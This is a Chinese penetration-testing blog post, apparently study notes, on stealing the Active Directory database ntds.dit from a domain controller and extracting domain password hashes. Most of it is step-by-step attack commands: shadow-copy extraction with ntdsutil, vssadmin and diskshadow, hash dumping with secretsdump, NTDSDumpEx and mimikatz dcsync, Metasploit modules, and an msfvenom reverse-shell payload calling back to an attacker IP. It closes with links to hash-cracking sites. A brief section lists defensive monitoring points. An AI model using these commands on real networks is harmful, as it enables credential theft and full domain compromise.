<!DOCTYPE html><html lang="zh-Hans"><head><meta name="generator" content="Hexo 3.9.0"><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport"><meta content="yes" name="apple-mobile-web-app-capable"><meta content="black-translucent" name="apple-mobile-web-app-status-bar-style"><meta content="telephone=no" name="format-detection"><meta name="renderer" content="webkit"><title>域控制器 - Guko's Blog</title><meta name="description" content="在通常情况下，即使拥有管理员权限，也无法读取域控制器中的C\Windows\NTDS\ntds.dit文件（活动目录始终访问这个文件，所以文件被禁止读取）。使用Windows本地卷影拷贝服务，就可以获得文件的副本接下来对常用的提取ntds.dit文件的方法，进行一个学习记录0x01 使用卷影拷贝服务"><link type="text/css" rel="stylesheet" href="/css/pure.css?v=0.0.1"><link type="text/css" rel="stylesheet" href="/css/style.css?v=0.0.1"><script type="text/javascript" src="//cdn.bootcss.com/jquery/1.11.0/jquery.min.js"></script></head></html><body><div class="body_container"><div id="header"><div class="site-name"><h1 class="hidden">域控制器</h1><a id="logo" href="/.">Guko's Blog</a></div><div id="nav-menu"><div class="bitcron_nav"><div class="site_nav_wrap"><div class="site_nav"><span class="a_container"><a href="/." class="selected active current">首页</a></span><span class="a_container"><a href="/archives/">归档</a></span><span class="a_container"><a href="/about/">关于</a></span><span class="a_container"><a href="/atom.xml">订阅</a></span></div></div></div></div></div><div id="layout" class="pure-g"><div class="pure-u-1 pure-u-md-3-4"><div class="content_container"><div class="post"><h1 class="post-title">域控制器</h1><div class="post-meta">2020-07-03<script src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" type="text/javascript"></script><span class="meta-space">  |  </span><span id="busuanzi_container_page_pv"><span id="busuanzi_value_page_pv"></span><span> 浏览</span></span></div><!--文章内容--><div class="post-content"><p>在通常情况下，即使拥有管理员权限，也无法读取域控制器中的<code>C\Windows\NTDS\ntds.dit</code>文件（活动目录始终访问这个文件，所以文件被禁止读取）。使用Windows本地卷影拷贝服务，就可以获得文件的副本</p>
<a id="more"></a>
<p><img src="/2020/07/03/域控制器/0.png" alt></p>
<p>接下来对常用的提取ntds.dit文件的方法，进行一个学习记录</p>
<h4 id="0x01-使用卷影拷贝服务提取ntds-dit"><a href="#0x01-使用卷影拷贝服务提取ntds-dit" class="headerlink" title="0x01 使用卷影拷贝服务提取ntds.dit"></a>0x01 使用卷影拷贝服务提取ntds.dit</h4><p>在活动目录中，所有的数据都保存在<code>ntds.dit</code>文件中。ntds.dit是一个二进制文件，存储位置为域控制器的%SystemRoot%\ntds.dit。<code>ntds.dit中包含（但不限于）用户名、散列值、组、GPP、OU等活动目录相关的信息</code>。它和SAM文件一样，是被windows操作系统锁定的。</p>
<p>这里介绍从系统中导出ntds.dit，以及如何读取ntds.dit中的信息。可以使用<code>卷影拷贝服务（Volume Shadow Copy Service VSS）</code>实现这些操作。<code>VSS</code>本质属于快照（Snapshot）技术的一种，用于备份和恢复，即使在目标文件当前处于锁定状态</p>
<h5 id="通过ntdsutil-exe提取ntds-dit"><a href="#通过ntdsutil-exe提取ntds-dit" class="headerlink" title="通过ntdsutil.exe提取ntds.dit"></a>通过ntdsutil.exe提取ntds.dit</h5><p><code>ntdsutil.exe</code>是一个为活动目录提供管理机制的命令行工具。使用<code>ntdsutil.exe</code>可以维护和管理互动目录数据库、控制单个主机操作、创建应用程序目录分区、删除由未使用活动目录安装向导（DCPRome.exe）成功降级的域控制器留下的元数据等。该工具默认安装在域控制器上，可以在域控制器上直接操作，可可以通过域内机器在域控制器上远程操作。</p>
<p><code>ntdsutil.exe</code>支持的操作系统</p>
<p>Windows server 2003</p>
<p>Windows server 2008 </p>
<p>Windows server 2012</p>
<p>第一步，创建一个快照。该快照包含windows中的所有文件，且在复制文件时不会受到windows锁定机制的限制</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ntdsutil snapshot &quot;activate instance ntds&quot; create quit quit</span><br></pre></td></tr></table></figure>

<p>可以看到，创建了一个<code>GUID</code>为<code>f9138964-78d0-4c5e-94a5-8f1ce0fd14ec</code>的快照</p>
<p><img src="/2020/07/03/域控制器/1.png" alt></p>
<p>第二步，加载刚刚创建的快照。命令格式为<code>ntdsutil snapshot &quot;mount {GUID}&quot; quit quit</code>其中的<code>GUID</code>就是刚刚创建的快照<code>GUID</code>。本次的实验中，快照被加载到<code>C:\$SNAP_202007011616_VOLUMEC$\</code>目录下</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ntdsutil snapshot &quot;mount &#123;f9138964-78d0-4c5e-94a5-8f1ce0fd14ec&#125;&quot; quit quit</span><br></pre></td></tr></table></figure>

<p><img src="/2020/07/03/域控制器/2.png" alt></p>
<p>第三步，使用windows自带的<code>copy命令</code>将快照中的文件复制出来,下面的命令是将快照中的<code>C:\$SNAP_202007011616_VOLUMEC$\windows\ntds\ntds.dit</code>复制到本地计算机的<code>C:\Users\Administrator\Desktop\</code>桌面上</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">copy C:\$SNAP_202007011616_VOLUMEC$\windows\ntds\ntds.dit C:\Users\Administrator\Desktop\ntds.dit</span><br></pre></td></tr></table></figure>

<p><img src="/2020/07/03/域控制器/3.png" alt></p>
<p>第四步，将之前加载的快照卸载并删除，其中  为所创建快照的<code>GUID</code>。每次创建的快照的<code>GUID</code>不同</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ntdsutil snapshot &quot;unmout &#123;f9138964-78d0-4c5e-94a5-8f1ce0fd14ec&#125;&quot; &quot;delete &#123;f9138964-78d0-4c5e-94a5-8f1ce0fd14ec&#125;&quot; quit quit</span><br></pre></td></tr></table></figure>

<p><img src="/2020/07/03/域控制器/4.png" alt></p>
<p>第五步，查询当前系统中的所有快照，现实没有任何快照，表示删除成功</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ntdsutil snapshot &quot;List All&quot; quit quit</span><br></pre></td></tr></table></figure>

<p><img src="/2020/07/03/域控制器/5.png" alt></p>
<h5 id="利用vssadmin提取ntds-dit"><a href="#利用vssadmin提取ntds-dit" class="headerlink" title="利用vssadmin提取ntds.dit"></a>利用vssadmin提取ntds.dit</h5><p><code>vssadmin</code>是<code>windows server2008及Windows7</code>提供的<code>VSS</code>管理工具，可用于创建和删除卷影拷贝、列出卷影拷贝的信息（只能管理系统Provider创建的卷影拷贝）、显示已安装的所有卷影拷贝写入程序（writers）和提供程序（providers）以及改变卷影拷贝的存储空间，既diff空间的大小等</p>
<p>第一步，在域控制器命令行环境中，创建一个C盘的卷影拷贝</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">vssadmin create shadow /for=c:</span><br></pre></td></tr></table></figure>

<p><img src="/2020/07/03/域控制器/6.png" alt></p>
<p>第二步，在创建的卷影拷贝中将<code>ntds.dit</code>复制到桌面上</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\windows\NTDS\ntds.dit C:\Users\Administrator\Desktop\ntds.dit</span><br></pre></td></tr></table></figure>

<p><img src="/2020/07/03/域控制器/7.png" alt></p>
<p>一个查找文件小技巧：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">dir C:\Users\Administrator\Desktop | findstr &quot;ntds&quot;</span><br></pre></td></tr></table></figure>

<p><img src="/2020/07/03/域控制器/8.png" alt></p>
<p>第三部，删除快照</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">vssadmin delete shadows /for=c: /quiet</span><br></pre></td></tr></table></figure>

<p><img src="/2020/07/03/域控制器/9.png" alt></p>
<h5 id="利用vssown-vbs脚本提取nods-dit"><a href="#利用vssown-vbs脚本提取nods-dit" class="headerlink" title="利用vssown.vbs脚本提取nods.dit"></a>利用vssown.vbs脚本提取nods.dit</h5><p><code>vssown.vbs</code>脚本的功能和<code>vssadmin</code>类似。可用于<code>创建和删除卷影拷贝</code>，以及启动和停止卷影拷贝服务</p>
<p>vssown.vbs下载地址：<a href="https://raw.githubusercontent.com/borigue/ptscripts/master/windows/vssown.vbs" target="_blank" rel="noopener">https://raw.githubusercontent.com/borigue/ptscripts/master/windows/vssown.vbs</a></p>
<p>脚本常用命令</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">//启动卷影拷贝服务</span><br><span class="line">cscript vssown.vbs /start</span><br><span class="line">//创建一个C盘的卷影拷贝</span><br><span class="line">cscript vssown.vbs /create c</span><br><span class="line">//列出当前卷影拷贝</span><br><span class="line">cscript vssown.vbs /list</span><br><span class="line">//删除卷影拷贝</span><br><span class="line">cscript vssown.vbs /delete</span><br></pre></td></tr></table></figure>

<p>第一步，启动卷影拷贝服务</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cscript vssown.vbs /start</span><br></pre></td></tr></table></figure>

<p><img src="/2020/07/03/域控制器/10.png" alt></p>
<p>第二步，创建一个C盘的卷影拷贝</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cscript vssown.vbs /create c</span><br></pre></td></tr></table></figure>

<p><img src="/2020/07/03/域控制器/11.png" alt></p>
<p>第三步，列出当前卷影拷贝，可以看到存在一个ID为<code>{E53CE962-3BF1-4F1C-B6B2-0B7118EC8098}</code>的卷影拷贝，存储位置为<code>\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3</code></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cscript vssown.vbs /list</span><br></pre></td></tr></table></figure>

<p><img src="/2020/07/03/域控制器/12.png" alt></p>
<p>第四步，复制<code>ntds.dit</code>到本地计算机的桌面</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\windows\NTDS\ntds.dit C:\Users\Administrator\Desktop\ntds.dit</span><br></pre></td></tr></table></figure>

<p><img src="/2020/07/03/域控制器/13.png" alt></p>
<p>第五步，删除卷影拷贝</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cscript vssown.vbs /delete &#123;E53CE962-3BF1-4F1C-B6B2-0B7118EC8098&#125;</span><br></pre></td></tr></table></figure>

<p><img src="/2020/07/03/域控制器/14.png" alt></p>
<h5 id="使用ntdsutil的IFM创建卷影拷贝"><a href="#使用ntdsutil的IFM创建卷影拷贝" class="headerlink" title="使用ntdsutil的IFM创建卷影拷贝"></a>使用ntdsutil的IFM创建卷影拷贝</h5><p>除了以上通过命令来提取<code>ntds.dit</code>也可以使用创建一个<code>IFM的方式获取ntds.dit</code>。再使用ntdsutil创建IFM时，需要进行生成快照、加载、将ntds.dit和计算机的SAM文件复制到目标文件夹中等操作。这些操作可以通过<code>PowerShell</code>或<code>WMI</code>远程执行</p>
<p>第一步，在域控制器中以管理员模式打开命令行环境，输入以下命令</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ntdsutil &quot;ac i ntds&quot; &quot;ifm&quot; &quot;create full C:/test&quot; qq</span><br></pre></td></tr></table></figure>

<p><img src="/2020/07/03/域控制器/15.png" alt></p>
<p>这里的意思是将ntds.dit复制到<code>C:\test\Active Directory\</code>文件夹下，然后将<code>SYSTEM</code>和<code>SECURIYTY</code>复制到<code>C:\test\registry</code>文件夹喜爱</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">dir &quot;C:\test\Active Directory&quot;</span><br><span class="line">dir &quot;C:\test\registry&quot;</span><br></pre></td></tr></table></figure>

<p><img src="/2020/07/03/域控制器/16.png" alt></p>
<p>第二步，将<code>ntds.dit</code>拖回本地后，在目标机器上，就是域控机器将文件夹删除</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">rmdir /s/q test</span><br></pre></td></tr></table></figure>

<p>Nishang中有一个Copy-VSS.ps1。将该脚本提取出来，在域控制器上打开PowerShell，导入脚本运行</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Import-Module .\Copy-VSS.ps1</span><br><span class="line">Copy-vss</span><br></pre></td></tr></table></figure>

<p><img src="/2020/07/03/域控制器/17.png" alt></p>
<h5 id="使用diskshadow导出ntds-dit"><a href="#使用diskshadow导出ntds-dit" class="headerlink" title="使用diskshadow导出ntds.dit"></a>使用diskshadow导出ntds.dit</h5><p><code>diskshadow.exe</code>这款工具可以使用卷影拷贝服务（VSS）所提供的多个功能。在默认配置下，<code>diskshadow.exe</code>使用了一种交互式命令解释器，与DiskRaid或DiskPart类似。因为diskshadow的代码是微软签名的，且<code>windows server 2008、windows server2012和Windows server2016都默认包含diskshadow</code>，所以，diskshadow也可用来操作卷影拷贝服务并导出nods.dit。diskshadow的功能与vshadow类似，且同样为位于<code>C:\windows\system32\</code>目录下。不过,vshadow是包含在windows SDK中的，在实际应用中可能需要将其上传到目标机器中。</p>
<p><code>diskshadow</code>有交互和非交互两种模式。在使用交互模式时，需要登录远程桌面的图形化管理界面。不论是交互模式还是非交互模式，都可以使用exec调取一个脚本文件来执行相关命令。下面为diskshadow一些常见命令及用法。</p>
<p>查看<code>diskshadow.exe</code>的帮助信息</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">diskshadow /?</span><br></pre></td></tr></table></figure>

<p><img src="/2020/07/03/域控制器/18.png" alt></p>
<p><img src="/2020/07/03/域控制器/20.png" alt></p>
<p>在渗透测试中，可以使用<code>diskshadow.exe</code>来执行命令。如将需要执行的命令<code>exec c:\windows\system32\calc.exe</code>写入C盘目录下的command.txt文件</p>
<p>使用<code>diskshadow.exe</code>执行该文件中的命令</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">type c:\command.txt</span><br><span class="line">diskshadow /s c:\command.txt</span><br></pre></td></tr></table></figure>

<p><img src="/2020/07/03/域控制器/19.png" alt></p>
<p>使用<code>diskshadow.exe</code>来导出<code>ntds.dit</code>将如下命令写入一个文本文件</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">//设置卷影拷贝</span><br><span class="line">set context persistent nowriters</span><br><span class="line">//添加卷</span><br><span class="line">add volume c: alias someAlias</span><br><span class="line">//创建快照</span><br><span class="line">create</span><br><span class="line">//分配虚拟磁盘盘符</span><br><span class="line">expose %someAlias% k:</span><br><span class="line">//将ntds.dit复制到C盘中</span><br><span class="line">exec &quot;cmd.exe&quot; /c copy k:\Windows\NTDS\ntds.dit C:\Users\Administrator\Desktop\</span><br><span class="line">//删除所有快照</span><br><span class="line">delete shadows all</span><br><span class="line">//列出系统中的卷影拷贝</span><br><span class="line">list shadows all</span><br><span class="line">//重置</span><br><span class="line">reset</span><br><span class="line">//退出</span><br><span class="line">exit</span><br></pre></td></tr></table></figure>

<p>使用<code>diskshadow.exe</code>直接加载这个文本文件</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">diskshadow /s c:\command.txt</span><br></pre></td></tr></table></figure>

<p>在使用<code>diskshadow.exe</code>进行导出<code>ntds.dit</code>的操作时，必须将当前域控制器执行shell的路径切换到<code>C:\windows\system32\</code>否则会发生报错,错误如下</p>
<p><img src="/2020/07/03/域控制器/21.png" alt></p>
<p>切换到<code>C:\windows\system32\</code>目录后使用<code>diskshadow.exe</code>加载command.txt执行，正常</p>
<p><img src="/2020/07/03/域控制器/22.png" alt></p>
<p>导出<code>ntds.dit</code>后，可以将<code>system.hive</code>转储。因为<code>system.hive</code>中存放着<code>ntds.dit的密钥</code>，如果没有该密钥，将无法查看ntds.dit中的信息</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">reg save hklm\system C:\Users\Administrator\Desktop\system.hive</span><br></pre></td></tr></table></figure>

<p><img src="/2020/07/03/域控制器/23.png" alt></p>
<p>使用<code>diskshadow.exe</code>的过程中，需要注意的以下几点</p>
<ul>
<li>渗透测试过程中可以在非特权用户权限下使用diskshadow.exe的部分功能。与其他工具相比，diskshadow.exe的使用更为灵活</li>
<li>在使用diskshadow.exe执行命令时，需要将文本文件上传到目标操作系统的本地磁盘中，或者通过交互模式完成操作。而在使用vshadow等工具时，可以直接执行相关命令</li>
<li>在渗透中，应先将含有需要执行的命令的文本文件写入远程目标操作系统，再使用diskshadow.exe调用该文本文件</li>
<li>在使用diskshadow.exe导出ntds.dit时，可以通过WMI对远程主机进行操作</li>
<li>在使用diskshadow.exe导出ntds.dit时，必须在C:\windows\system32\中进行操作</li>
<li>脚本执行后，要检查从快照中复制出来的ntds.dit文件大小，如果文件大小发生了改变，可以检查或修改脚本后重新执行</li>
</ul>
<h5 id="怎么防御，监控卷影拷贝服务的使用情况"><a href="#怎么防御，监控卷影拷贝服务的使用情况" class="headerlink" title="怎么防御，监控卷影拷贝服务的使用情况"></a>怎么防御，监控卷影拷贝服务的使用情况</h5><p>通过监控卷影拷贝服务的使用情况，可以及时发现攻击者在系统中进行的一些恶意操作</p>
<ul>
<li>监控卷影拷贝服务及任何涉及活动目录数据库文件（ntds.dit）的可疑操作行为</li>
<li>监控System Event ID 7036(卷影拷贝服务进入运行状态的标志)的可疑实例，以及创建vssvc.exe进程的事件</li>
<li>监控创建diskshadow.exe及相关子进程的事件</li>
<li>监控客户端设备中的diskshadow.exe实例创建事件。如无业务需要，在操作系统中不应该出现diskshadow.exe，如出现，立刻删除</li>
<li>通过日志监控新出现的逻辑驱动器映射事件</li>
</ul>
<h4 id="0x02-导出ntds-dit中的散列值"><a href="#0x02-导出ntds-dit中的散列值" class="headerlink" title="0x02 导出ntds.dit中的散列值"></a>0x02 导出ntds.dit中的散列值</h4><h5 id="使用impacket工具包导出散列值"><a href="#使用impacket工具包导出散列值" class="headerlink" title="使用impacket工具包导出散列值"></a>使用impacket工具包导出散列值</h5><p>使用impacket工具包中的<code>secretsdump.exe</code>windows环境下</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">secretsdump.exe -system SYSTEM.hive -ntds ntds.dit LOCAL</span><br></pre></td></tr></table></figure>

<p><img src="/2020/07/03/域控制器/pingmao/Desktop/%E5%9F%9F%E6%8E%A7%E5%88%B6%E5%99%A8/%E5%9F%9F%E6%8E%A7%E5%88%B6%E5%99%A8/35.png" alt></p>
<h5 id="Windows下使用NTDSDumpEx解析ntds-dit获取散列值"><a href="#Windows下使用NTDSDumpEx解析ntds-dit获取散列值" class="headerlink" title="Windows下使用NTDSDumpEx解析ntds.dit获取散列值"></a>Windows下使用NTDSDumpEx解析ntds.dit获取散列值</h5><p><code>NTDSDumpEx</code>下载地址：<a href="https://github.com/zcgonvh/NTDSDumpEx" target="_blank" rel="noopener">https://github.com/zcgonvh/NTDSDumpEx</a></p>
<p>使用方式</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">ntdsdumpex.exe -r</span><br><span class="line">ntdsdumpex.exe -d ntds.dit -o hash.txt -s system.hiv</span><br><span class="line">ntdsdumpex.exe -d ntds.dit -o hash.txt -s system.hive</span><br></pre></td></tr></table></figure>

<p>测试了一下QuarksPwDump不成功在Windows2008上报错，<code>AFA</code>解答说QuarksPwDump不能自己加载seckey，因此使用头像哥的NTDSDumpEx进行操作</p>
<p><img src="/2020/07/03/域控制器/29.png" alt></p>
<h4 id="0x03-利用dcsync获取域散列值"><a href="#0x03-利用dcsync获取域散列值" class="headerlink" title="0x03 利用dcsync获取域散列值"></a>0x03 利用dcsync获取域散列值</h4><h5 id="使用mimikatz转储域散列值"><a href="#使用mimikatz转储域散列值" class="headerlink" title="使用mimikatz转储域散列值"></a>使用mimikatz转储域散列值</h5><p><code>mimikatz</code>有一个d<code>csync</code>功能，可以被利用卷影拷贝服务直接读取<code>ntds.dit</code>文件并检索域散列值。注意，必须使用域管理员权限运行mimikatz才可以读取ntds.dit</p>
<p>在域内的任意计算机上，以域管理员权限打开命令行环境，运行mimikatz。导出域内的所有用户名及散列值</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">lsadump::dcsync /domain:Motoo.nc /all /csv</span><br></pre></td></tr></table></figure>

<p><img src="/2020/07/03/域控制器/24.png" alt></p>
<p>使用<code>mimikatz</code>的<code>dcsync</code>功能也可以导出指定用户的散列值，如下命令，可导出域用户wangfang的散列值</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">lsadump::dcsync /domain:Motoo.nc /user:wangfang</span><br></pre></td></tr></table></figure>

<p><img src="/2020/07/03/域控制器/25.png" alt></p>
<p>也可以直接在域控制器中运行mimikatz，通过转储<code>lsass.exe</code>进程对散列值进行<code>Dump</code>操作。如果没有预先执行<code>privilege::debug</code>命令，将导致权限不足、读取失败。若用户数数多，mimikatz无法全部显示出阿里，可以先执行<code>log</code>命令，这样会在mimikatz目录下生成一个文本文件，用于记录mimikatz的所有执行结果</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">privilege::debug</span><br><span class="line">lsadump::lsa /inject</span><br><span class="line">mimikatz.exe &quot;&quot;privilege::debug&quot;&quot; &quot;&quot;lsadump::lsa /inject&quot;&quot; exit &gt;&gt; log.txt</span><br></pre></td></tr></table></figure>

<p><img src="/2020/07/03/域控制器/26.png" alt></p>
<p><img src="/2020/07/03/域控制器/27.png" alt></p>
<h5 id="使用dcsync获取域账号和域散列值"><a href="#使用dcsync获取域账号和域散列值" class="headerlink" title="使用dcsync获取域账号和域散列值"></a>使用dcsync获取域账号和域散列值</h5><p><code>Invoke-DCSync.ps1</code>可以利用dcsync直接读取nods.dit，以获取域账号和域散列值下载地址：<a href="https://gist.githubusercontent.com/monoxgas/9d238accd969550136db/raw/7806cc26744b6025e8f1daf616bc359cb6a11965/Invoke-DCSync.ps1" target="_blank" rel="noopener">https://gist.githubusercontent.com/monoxgas/9d238accd969550136db/raw/7806cc26744b6025e8f1daf616bc359cb6a11965/Invoke-DCSync.ps1</a></p>
<p>命令如下，<code>-PWDumpFormat</code>参数是用于对输出的内容进行格式化</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Import-Module .\Invoke-DCSync.ps1</span><br><span class="line">Invoke-DCSync -PWDumpFormat</span><br></pre></td></tr></table></figure>

<p><img src="/2020/07/03/域控制器/28.png" alt></p>
<h4 id="0x04-使用metasploit获取域散列值"><a href="#0x04-使用metasploit获取域散列值" class="headerlink" title="0x04 使用metasploit获取域散列值"></a>0x04 使用metasploit获取域散列值</h4><p><strong>1、psexec_ntdsgrab模块的使用</strong></p>
<p>使用<code>psexec_ntdsgrab</code>模块,设置参数有<code>RHOST</code>、<code>SMBDomain</code>、<code>SMBUser</code>、<code>SMBPass</code></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">use auxiliary/admin/smb/psexec_ntdsgrab</span><br></pre></td></tr></table></figure>

<p><img src="/2020/07/03/域控制器/32.png" alt></p>
<p>然后执行<code>run</code>(该脚本使用卷影拷贝服务)将ntds.dit文件和SYSTEM项复制并传送到<code>/root/.msf4/loot/</code>文件夹下,如此即可使用impacket工具包解析ntds.dit文件，导出域账号和域散列值了</p>
<p><img src="/2020/07/03/域控制器/33.png" alt></p>
<p><strong>2、基于meterpreter会话获取域账号域散列值</strong></p>
<p>设置监听</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">use exploit/multi/handler </span><br><span class="line">set payload windows/x64/meterpreter/reverse_tcp</span><br><span class="line">set lhost 0.0.0.0</span><br><span class="line">set lport 5555</span><br></pre></td></tr></table></figure>

<p>生成payload</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.6 LPORT=5555 -f exe &gt; pen.exe</span><br></pre></td></tr></table></figure>

<p>在目标机器上执行，获取到meterpreter</p>
<p><img src="/2020/07/03/域控制器/34.png" alt></p>
<p>接下来，使用<code>domain_hashdump</code>模块获取域域账号和域散列值。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">use post/windows/gather/credentials/domain_hashdump</span><br></pre></td></tr></table></figure>

<p>这里设置之后执行没成功….没复现出来</p>
<h4 id="0x05-使用vhadow-exe和QuarksPwDump-exe导出域账号和散列值"><a href="#0x05-使用vhadow-exe和QuarksPwDump-exe导出域账号和散列值" class="headerlink" title="0x05 使用vhadow.exe和QuarksPwDump.exe导出域账号和散列值"></a>0x05 使用vhadow.exe和QuarksPwDump.exe导出域账号和散列值</h4><p>在正常域环境中<code>ntds.dit</code>文件里包含大量的信息，体积较大，不方便保存到本地。如果域控制器上没有安装杀毒软件，可以直接进入域控制器，导出<code>ntds.dit</code>并获得域账号和域散列值，而不需要将<code>ntds.dit</code>保存到本地。</p>
<p>QuarksPwDump可以快速、安全、全面地读取全部域账号和域散列值，其源码下载地址：<a href="https://github.com/quarkslab/quarkspwdump" target="_blank" rel="noopener">https://github.com/quarkslab/quarkspwdump</a></p>
<p><code>ShadowCopy</code>是一款免费的增强型文件复制工具。ShadowCopy使用微软的卷影拷贝技术，能够复制被锁定的文件及其他程序打开的文件。</p>
<p><code>vshadow.exe</code>是从<code>Windows SDK</code>中提取出来的。安装vshadow.exe后，会在<code>VSSSKDK72\TstsApps\vshadow</code>目录下生成一个bin文件<code>vshadow.exe</code>（可以将该文件单独提取出来使用）</p>
<p>实验有点问题</p>
<p>针对<code>NTLM Hash</code>的常用在线破解网站有如下：</p>
<p><a href="https://www.cmd5.com/" target="_blank" rel="noopener">https://www.cmd5.com/</a></p>
<p><a href="https://www.somd5.com/" target="_blank" rel="noopener">https://www.somd5.com/</a></p>
<p>针对<code>LM Hash</code>的在线破解网站</p>
<p><a href="http://cracker.offensive-security.com/index.php" target="_blank" rel="noopener">http://cracker.offensive-security.com/index.php</a></p>
<p>参考资料：</p>
<p>内网渗透实战指南</p>
</div><!--文章标签--><div class="tags"></div><!--评论--></div></div></div><div class="pure-u-1-4"><div id="sidebar"><div class="widget"><form action="//www.google.com/search" method="get" accept-charset="utf-8" id="search" target="_blank" class="search-form"><input type="text" name="q" maxlength="20" placeholder="Search"><input type="hidden" name="sitesearch" value="http://yoursite.com"></form></div><div class="widget"><div class="widget-title"> 分类</div><ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/python/">python</a><span class="category-list-count">2</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/内网渗透/">内网渗透</a><span class="category-list-count">22</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/工具使用/">工具使用</a><span class="category-list-count">2</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/杂记/">杂记</a><span class="category-list-count">2</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/渗透/">渗透</a><span class="category-list-count">6</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/漏洞复现/">漏洞复现</a><span class="category-list-count">6</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/靶机/">靶机</a><span class="category-list-count">1</span></li></ul></div><div class="widget"><div class="widget-title"> 标签</div><div class="tagcloud"><a href="/tags/metasploit/" style="font-size: 16px;">metasploit</a> <a href="/tags/代码执行/" style="font-size: 12px;">代码执行</a> <a href="/tags/权限提升/" style="font-size: 12px;">权限提升</a> <a href="/tags/文件读取/" style="font-size: 12px;">文件读取</a> <a href="/tags/cobaltstrike/" style="font-size: 14px;">cobaltstrike</a> <a href="/tags/Cobalt-Strike/" style="font-size: 12px;">Cobalt 